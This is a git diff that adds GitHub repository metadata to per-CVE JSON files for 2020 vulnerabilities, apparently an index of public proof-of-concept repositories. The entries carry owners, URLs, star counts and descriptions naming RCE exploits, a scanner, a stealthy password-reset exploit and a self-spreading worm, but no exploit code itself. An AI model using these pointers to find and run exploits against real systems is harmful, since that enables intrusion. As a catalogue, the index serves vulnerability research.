--- a/2020/CVE-2020-5248.json
+++ b/2020/CVE-2020-5248.json
@@ -28,5 +28,35 @@
"watchers": 2,
"score": 0,
"subscribers_count": 0
+ },
+ {
+ "id": 390551926,
+ "name": "CVE-2020-5248",
+ "full_name": "Mkway\/CVE-2020-5248",
+ "owner": {
+ "login": "Mkway",
+ "id": 34364080,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34364080?v=4",
+ "html_url": "https:\/\/github.com\/Mkway"
+ },
+ "html_url": "https:\/\/github.com\/Mkway\/CVE-2020-5248",
+ "description": "CVE-2020-5248",
+ "fork": false,
+ "created_at": "2021-07-29T00:46:26Z",
+ "updated_at": "2021-07-29T04:13:11Z",
+ "pushed_at": "2021-07-29T04:13:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-5421.json b/2020/CVE-2020-5421.json
new file mode 100644
index 0000000000..f050167c11
--- /dev/null
+++ b/2020/CVE-2020-5421.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 328377392,
+ "name": "CVE-2020-5421",
+ "full_name": "pandaMingx\/CVE-2020-5421",
+ "owner": {
+ "login": "pandaMingx",
+ "id": 45414475,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45414475?v=4",
+ "html_url": "https:\/\/github.com\/pandaMingx"
+ },
+ "html_url": "https:\/\/github.com\/pandaMingx\/CVE-2020-5421",
+ "description": "Spring 安全漏洞 CVE-2020-5421复现 ",
+ "fork": false,
+ "created_at": "2021-01-10T12:26:00Z",
+ "updated_at": "2023-05-31T03:49:05Z",
+ "pushed_at": "2021-01-10T12:48:19Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-5504.json b/2020/CVE-2020-5504.json
new file mode 100644
index 0000000000..359d1b67df
--- /dev/null
+++ b/2020/CVE-2020-5504.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 427957296,
+ "name": "CVE-2020-5504-phpMyAdmin",
+ "full_name": "xMohamed0\/CVE-2020-5504-phpMyAdmin",
+ "owner": {
+ "login": "xMohamed0",
+ "id": 94008154,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94008154?v=4",
+ "html_url": "https:\/\/github.com\/xMohamed0"
+ },
+ "html_url": "https:\/\/github.com\/xMohamed0\/CVE-2020-5504-phpMyAdmin",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-14T14:54:04Z",
+ "updated_at": "2023-08-28T12:43:02Z",
+ "pushed_at": "2021-11-14T14:54:40Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-5510.json b/2020/CVE-2020-5510.json
new file mode 100644
index 0000000000..422c7dbbb2
--- /dev/null
+++ b/2020/CVE-2020-5510.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 435276362,
+ "name": "CVE-2020-5510",
+ "full_name": "5l1v3r1\/CVE-2020-5510",
+ "owner": {
+ "login": "5l1v3r1",
+ "id": 34143537,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34143537?v=4",
+ "html_url": "https:\/\/github.com\/5l1v3r1"
+ },
+ "html_url": "https:\/\/github.com\/5l1v3r1\/CVE-2020-5510",
+ "description": "Car Rental Project v.1.0 Remote Code Execution",
+ "fork": false,
+ "created_at": "2021-12-05T20:53:18Z",
+ "updated_at": "2021-12-05T20:53:19Z",
+ "pushed_at": "2020-01-05T22:23:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-5839.json b/2020/CVE-2020-5839.json
new file mode 100644
index 0000000000..f2be2d231e
--- /dev/null
+++ b/2020/CVE-2020-5839.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 354341629,
+ "name": "CVE-2020-5839",
+ "full_name": "nasbench\/CVE-2020-5839",
+ "owner": {
+ "login": "nasbench",
+ "id": 8741929,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8741929?v=4",
+ "html_url": "https:\/\/github.com\/nasbench"
+ },
+ "html_url": "https:\/\/github.com\/nasbench\/CVE-2020-5839",
+ "description": "CVE-2020-5839 POC",
+ "fork": false,
+ "created_at": "2021-04-03T16:35:38Z",
+ "updated_at": "2021-07-04T20:31:17Z",
+ "pushed_at": "2021-04-03T16:40:13Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-5902.json b/2020/CVE-2020-5902.json
index d27d2a272a..c79b21fade 100644
--- a/2020/CVE-2020-5902.json
+++ b/2020/CVE-2020-5902.json
@@ -1555,6 +1555,71 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 336016319,
+ "name": "F5-BIG-IP-CVE-2020-5902-shodan-scanner",
+ "full_name": "faisalfs10x\/F5-BIG-IP-CVE-2020-5902-shodan-scanner",
+ "owner": {
+ "login": "faisalfs10x",
+ "id": 51811615,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51811615?v=4",
+ "html_url": "https:\/\/github.com\/faisalfs10x"
+ },
+ "html_url": "https:\/\/github.com\/faisalfs10x\/F5-BIG-IP-CVE-2020-5902-shodan-scanner",
+ "description": "simple bash script of F5 BIG-IP TMUI Vulnerability CVE-2020-5902 checker",
+ "fork": false,
+ "created_at": "2021-02-04T16:36:21Z",
+ "updated_at": "2023-04-22T21:33:25Z",
+ "pushed_at": "2021-02-04T17:38:40Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "bigip",
+ "cve-2020-5902",
+ "exploit",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 357452088,
+ "name": "CVE-2020-5902",
+ "full_name": "haisenberg\/CVE-2020-5902",
+ "owner": {
+ "login": "haisenberg",
+ "id": 64567828,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64567828?v=4",
+ "html_url": "https:\/\/github.com\/haisenberg"
+ },
+ "html_url": "https:\/\/github.com\/haisenberg\/CVE-2020-5902",
+ "description": "Auto exploit RCE CVE-2020-5902 ",
+ "fork": false,
+ "created_at": "2021-04-13T06:48:20Z",
+ "updated_at": "2023-09-28T11:26:45Z",
+ "pushed_at": "2021-04-13T21:13:23Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 497326298,
"name": "F5-BIG-IP-POC",
diff --git a/2020/CVE-2020-6207.json b/2020/CVE-2020-6207.json
new file mode 100644
index 0000000000..c71ef179ac
--- /dev/null
+++ b/2020/CVE-2020-6207.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 329585845,
+ "name": "SAP_EEM_CVE-2020-6207",
+ "full_name": "chipik\/SAP_EEM_CVE-2020-6207",
+ "owner": {
+ "login": "chipik",
+ "id": 6584277,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6584277?v=4",
+ "html_url": "https:\/\/github.com\/chipik"
+ },
+ "html_url": "https:\/\/github.com\/chipik\/SAP_EEM_CVE-2020-6207",
+ "description": "PoC for CVE-2020-6207 (Missing Authentication Check in SAP Solution Manager)",
+ "fork": false,
+ "created_at": "2021-01-14T10:49:40Z",
+ "updated_at": "2024-01-04T16:53:55Z",
+ "pushed_at": "2021-01-15T16:25:19Z",
+ "stargazers_count": 82,
+ "watchers_count": 82,
+ "has_discussions": false,
+ "forks_count": 31,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 31,
+ "watchers": 82,
+ "score": 0,
+ "subscribers_count": 5
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-6308.json b/2020/CVE-2020-6308.json
index dedc0bfa38..2d76704c74 100644
--- a/2020/CVE-2020-6308.json
+++ b/2020/CVE-2020-6308.json
@@ -58,5 +58,35 @@
"watchers": 0,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 399392671,
+ "name": "CVE-2020-6308",
+ "full_name": "TheMMMdev\/CVE-2020-6308",
+ "owner": {
+ "login": "TheMMMdev",
+ "id": 63477464,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63477464?v=4",
+ "html_url": "https:\/\/github.com\/TheMMMdev"
+ },
+ "html_url": "https:\/\/github.com\/TheMMMdev\/CVE-2020-6308",
+ "description": "Exploit script for SAP Business Objects SSRF",
+ "fork": false,
+ "created_at": "2021-08-24T08:36:11Z",
+ "updated_at": "2022-11-09T18:13:24Z",
+ "pushed_at": "2021-08-24T08:44:11Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-6418.json b/2020/CVE-2020-6418.json
index 46e4bf4f0f..5d8a28e4ab 100644
--- a/2020/CVE-2020-6418.json
+++ b/2020/CVE-2020-6418.json
@@ -58,5 +58,65 @@
"watchers": 4,
"score": 0,
"subscribers_count": 3
+ },
+ {
+ "id": 461299516,
+ "name": "ChromeSHELFLoader",
+ "full_name": "ulexec\/ChromeSHELFLoader",
+ "owner": {
+ "login": "ulexec",
+ "id": 14844304,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14844304?v=4",
+ "html_url": "https:\/\/github.com\/ulexec"
+ },
+ "html_url": "https:\/\/github.com\/ulexec\/ChromeSHELFLoader",
+ "description": "An exploit for CVE-2020-6418 implementing a SHELF Loader. Published as part of Tmp.0ut volume 2",
+ "fork": false,
+ "created_at": "2022-02-19T20:00:04Z",
+ "updated_at": "2022-11-09T18:15:21Z",
+ "pushed_at": "2022-02-20T03:23:43Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 472541786,
+ "name": "CVE-2020-6418",
+ "full_name": "SivaPriyaRanganatha\/CVE-2020-6418",
+ "owner": {
+ "login": "SivaPriyaRanganatha",
+ "id": 49935118,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49935118?v=4",
+ "html_url": "https:\/\/github.com\/SivaPriyaRanganatha"
+ },
+ "html_url": "https:\/\/github.com\/SivaPriyaRanganatha\/CVE-2020-6418",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-21T23:05:38Z",
+ "updated_at": "2022-04-29T02:55:50Z",
+ "pushed_at": "2022-03-23T02:22:39Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-6516.json b/2020/CVE-2020-6516.json
new file mode 100644
index 0000000000..5654255365
--- /dev/null
+++ b/2020/CVE-2020-6516.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 346747763,
+ "name": "whatsapp-mitd-mitm",
+ "full_name": "CENSUS\/whatsapp-mitd-mitm",
+ "owner": {
+ "login": "CENSUS",
+ "id": 11769276,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11769276?v=4",
+ "html_url": "https:\/\/github.com\/CENSUS"
+ },
+ "html_url": "https:\/\/github.com\/CENSUS\/whatsapp-mitd-mitm",
+ "description": "PoC and tools for exploiting CVE-2020-6516 (Chrome) and CVE-2021-24027 (WhatsApp)",
+ "fork": false,
+ "created_at": "2021-03-11T15:27:25Z",
+ "updated_at": "2024-06-07T07:41:44Z",
+ "pushed_at": "2021-05-25T11:14:56Z",
+ "stargazers_count": 145,
+ "watchers_count": 145,
+ "has_discussions": false,
+ "forks_count": 35,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 35,
+ "watchers": 145,
+ "score": 0,
+ "subscribers_count": 17
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-7048.json b/2020/CVE-2020-7048.json
new file mode 100644
index 0000000000..076a9eb920
--- /dev/null
+++ b/2020/CVE-2020-7048.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 328165952,
+ "name": "CVE-2020-7048",
+ "full_name": "ElmouradiAmine\/CVE-2020-7048",
+ "owner": {
+ "login": "ElmouradiAmine",
+ "id": 48139304,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48139304?v=4",
+ "html_url": "https:\/\/github.com\/ElmouradiAmine"
+ },
+ "html_url": "https:\/\/github.com\/ElmouradiAmine\/CVE-2020-7048",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-09T13:52:09Z",
+ "updated_at": "2021-05-22T17:21:51Z",
+ "pushed_at": "2021-01-09T13:54:30Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-7115.json b/2020/CVE-2020-7115.json
new file mode 100644
index 0000000000..4f5c1e1a51
--- /dev/null
+++ b/2020/CVE-2020-7115.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 381851975,
+ "name": "CVE-2020-7115",
+ "full_name": "Retr02332\/CVE-2020-7115",
+ "owner": {
+ "login": "Retr02332",
+ "id": 51862990,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51862990?v=4",
+ "html_url": "https:\/\/github.com\/Retr02332"
+ },
+ "html_url": "https:\/\/github.com\/Retr02332\/CVE-2020-7115",
+ "description": "Create your malicious engine in seconds",
+ "fork": false,
+ "created_at": "2021-06-30T22:56:07Z",
+ "updated_at": "2022-07-12T11:20:50Z",
+ "pushed_at": "2021-07-03T23:40:19Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-7200.json b/2020/CVE-2020-7200.json
new file mode 100644
index 0000000000..dcd7c5c0ea
--- /dev/null
+++ b/2020/CVE-2020-7200.json
@@ -0,0 +1,38 @@
+[
+ {
+ "id": 329734215,
+ "name": "CVE-2020-7200",
+ "full_name": "alexfrancow\/CVE-2020-7200",
+ "owner": {
+ "login": "alexfrancow",
+ "id": 23419929,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23419929?v=4",
+ "html_url": "https:\/\/github.com\/alexfrancow"
+ },
+ "html_url": "https:\/\/github.com\/alexfrancow\/CVE-2020-7200",
+ "description": "CVE-2020-7200: HPE Systems Insight Manager (SIM) RCE PoC",
+ "fork": false,
+ "created_at": "2021-01-14T21:05:29Z",
+ "updated_at": "2022-10-29T17:15:49Z",
+ "pushed_at": "2021-01-17T20:30:38Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "exploit",
+ "hpe",
+ "jboss",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-7247.json b/2020/CVE-2020-7247.json
index 6970869c4a..a4d13fab90 100644
--- a/2020/CVE-2020-7247.json
+++ b/2020/CVE-2020-7247.json
@@ -88,5 +88,160 @@
"watchers": 4,
"score": 0,
"subscribers_count": 2
+ },
+ {
+ "id": 338516393,
+ "name": "CVE-2020-7247-exploit",
+ "full_name": "QTranspose\/CVE-2020-7247-exploit",
+ "owner": {
+ "login": "QTranspose",
+ "id": 54239699,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54239699?v=4",
+ "html_url": "https:\/\/github.com\/QTranspose"
+ },
+ "html_url": "https:\/\/github.com\/QTranspose\/CVE-2020-7247-exploit",
+ "description": "OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution PoC exploit",
+ "fork": false,
+ "created_at": "2021-02-13T06:57:47Z",
+ "updated_at": "2023-02-08T11:50:15Z",
+ "pushed_at": "2021-02-17T09:23:57Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 373152472,
+ "name": "CVE-2020-7247",
+ "full_name": "bytescrappers\/CVE-2020-7247",
+ "owner": {
+ "login": "bytescrappers",
+ "id": 85182327,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85182327?v=4",
+ "html_url": "https:\/\/github.com\/bytescrappers"
+ },
+ "html_url": "https:\/\/github.com\/bytescrappers\/CVE-2020-7247",
+ "description": "This vulnerability exists in OpenBSD’s mail server OpenSMTPD’s “smtp_mailaddr()” function, and affects OpenBSD version 6.6. This allows an attacker to execute arbitrary shell commands like “sleep 66” as root user",
+ "fork": false,
+ "created_at": "2021-06-02T12:02:33Z",
+ "updated_at": "2021-06-02T12:02:34Z",
+ "pushed_at": "2021-02-01T13:20:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 378352740,
+ "name": "CVE-2020-7247",
+ "full_name": "f4T1H21\/CVE-2020-7247",
+ "owner": {
+ "login": "f4T1H21",
+ "id": 83399767,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83399767?v=4",
+ "html_url": "https:\/\/github.com\/f4T1H21"
+ },
+ "html_url": "https:\/\/github.com\/f4T1H21\/CVE-2020-7247",
+ "description": "PoC exploit for CVE-2020-7247 OpenSMTPD 6.4.0 < 6.6.1 Remote Code Execution",
+ "fork": false,
+ "created_at": "2021-06-19T07:34:42Z",
+ "updated_at": "2021-07-10T11:26:09Z",
+ "pushed_at": "2021-07-10T11:26:06Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2020-7247",
+ "exploit",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 432255271,
+ "name": "CVE-2020-7247-POC",
+ "full_name": "SimonSchoeni\/CVE-2020-7247-POC",
+ "owner": {
+ "login": "SimonSchoeni",
+ "id": 62761108,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62761108?v=4",
+ "html_url": "https:\/\/github.com\/SimonSchoeni"
+ },
+ "html_url": "https:\/\/github.com\/SimonSchoeni\/CVE-2020-7247-POC",
+ "description": "Proof of concept for CVE-2020-7247 for educational purposes.",
+ "fork": false,
+ "created_at": "2021-11-26T17:28:56Z",
+ "updated_at": "2023-08-17T02:58:27Z",
+ "pushed_at": "2022-01-20T18:36:05Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 456468236,
+ "name": "shai_hulud",
+ "full_name": "presentdaypresenttime\/shai_hulud",
+ "owner": {
+ "login": "presentdaypresenttime",
+ "id": 92856309,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92856309?v=4",
+ "html_url": "https:\/\/github.com\/presentdaypresenttime"
+ },
+ "html_url": "https:\/\/github.com\/presentdaypresenttime\/shai_hulud",
+ "description": "Worm written in python, abuses CVE-2020-7247",
+ "fork": false,
+ "created_at": "2022-02-07T10:59:36Z",
+ "updated_at": "2023-08-25T03:12:05Z",
+ "pushed_at": "2022-05-17T20:03:56Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-7352.json b/2020/CVE-2020-7352.json
new file mode 100644
index 0000000000..22810486c9
--- /dev/null
+++ b/2020/CVE-2020-7352.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 444602886,
+ "name": "PS-CVE-2020-7352",
+ "full_name": "szerszen199\/PS-CVE-2020-7352",
+ "owner": {
+ "login": "szerszen199",
+ "id": 72755079,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72755079?v=4",
+ "html_url": "https:\/\/github.com\/szerszen199"
+ },
+ "html_url": "https:\/\/github.com\/szerszen199\/PS-CVE-2020-7352",
+ "description": "Powershell implemetation of CVE-2020-7352",
+ "fork": false,
+ "created_at": "2022-01-05T00:11:58Z",
+ "updated_at": "2022-01-17T22:16:46Z",
+ "pushed_at": "2022-01-11T10:58:54Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-7378.json b/2020/CVE-2020-7378.json
new file mode 100644
index 0000000000..163a553a55
--- /dev/null
+++ b/2020/CVE-2020-7378.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 383296400,
+ "name": "openCRX-CVE-2020-7378",
+ "full_name": "ruthvikvegunta\/openCRX-CVE-2020-7378",
+ "owner": {
+ "login": "ruthvikvegunta",
+ "id": 49064045,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49064045?v=4",
+ "html_url": "https:\/\/github.com\/ruthvikvegunta"
+ },
+ "html_url": "https:\/\/github.com\/ruthvikvegunta\/openCRX-CVE-2020-7378",
+ "description": "Exploits Password Reset Vulnerability in OpenCRX, CVE-2020-7378. Also maintains Stealth by deleting all the password reset mails created by the script",
+ "fork": false,
+ "created_at": "2021-07-06T00:36:18Z",
+ "updated_at": "2023-04-12T15:38:59Z",
+ "pushed_at": "2021-07-06T01:06:56Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-7384.json b/2020/CVE-2020-7384.json
index 802710a25f..8a5dca1948 100644
--- a/2020/CVE-2020-7384.json
+++ b/2020/CVE-2020-7384.json
@@ -1,4 +1,34 @@
[
+ {
+ "id": 336827206,
+ "name": "CVE-2020-7384",
+ "full_name": "nikhil1232\/CVE-2020-7384",
+ "owner": {
+ "login": "nikhil1232",
+ "id": 39535219,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39535219?v=4",
+ "html_url": "https:\/\/github.com\/nikhil1232"
+ },
+ "html_url": "https:\/\/github.com\/nikhil1232\/CVE-2020-7384",
+ "description": "CVE-2020-7384",
+ "fork": false,
+ "created_at": "2021-02-07T16:00:41Z",
+ "updated_at": "2023-08-05T00:09:33Z",
+ "pushed_at": "2021-02-07T16:57:28Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 604312152,
"name": "CVE-2020-7384",
diff --git a/2020/CVE-2020-7461.json b/2020/CVE-2020-7461.json
index 7b741b4bac..d2acaf74a2 100644
--- a/2020/CVE-2020-7461.json
+++ b/2020/CVE-2020-7461.json
@@ -1,4 +1,34 @@
[
+ {
+ "id": 358036086,
+ "name": "CVE-2020-7461",
+ "full_name": "knqyf263\/CVE-2020-7461",
+ "owner": {
+ "login": "knqyf263",
+ "id": 2253692,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253692?v=4",
+ "html_url": "https:\/\/github.com\/knqyf263"
+ },
+ "html_url": "https:\/\/github.com\/knqyf263\/CVE-2020-7461",
+ "description": "PoC for DHCP vulnerability (NAME:WRECK) in FreeBSD",
+ "fork": false,
+ "created_at": "2021-04-14T20:37:38Z",
+ "updated_at": "2023-12-05T00:38:38Z",
+ "pushed_at": "2021-04-14T21:36:08Z",
+ "stargazers_count": 15,
+ "watchers_count": 15,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 15,
+ "score": 0,
+ "subscribers_count": 4
+ },
{
"id": 572664898,
"name": "freebsd-dhclient-poc",
diff --git a/2020/CVE-2020-7471.json b/2020/CVE-2020-7471.json
index fa78765e0b..5f6d9747d6 100644
--- a/2020/CVE-2020-7471.json
+++ b/2020/CVE-2020-7471.json
@@ -148,5 +148,65 @@
"watchers": 0,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 373481625,
+ "name": "CVE-2020-7471-Django",
+ "full_name": "huzaifakhan771\/CVE-2020-7471-Django",
+ "owner": {
+ "login": "huzaifakhan771",
+ "id": 56702423,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56702423?v=4",
+ "html_url": "https:\/\/github.com\/huzaifakhan771"
+ },
+ "html_url": "https:\/\/github.com\/huzaifakhan771\/CVE-2020-7471-Django",
+ "description": "PoC for the SQL injection vulnerability in PostgreSQL with Django, found in Django 1.11 before 1.11.28, 2.2 before 2.2.10, and 3.0 before 3.0.3",
+ "fork": false,
+ "created_at": "2021-06-03T11:21:27Z",
+ "updated_at": "2021-09-23T13:24:19Z",
+ "pushed_at": "2021-06-03T11:37:28Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 402122379,
+ "name": "CVE-2020-7471",
+ "full_name": "mrlihd\/CVE-2020-7471",
+ "owner": {
+ "login": "mrlihd",
+ "id": 77404450,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77404450?v=4",
+ "html_url": "https:\/\/github.com\/mrlihd"
+ },
+ "html_url": "https:\/\/github.com\/mrlihd\/CVE-2020-7471",
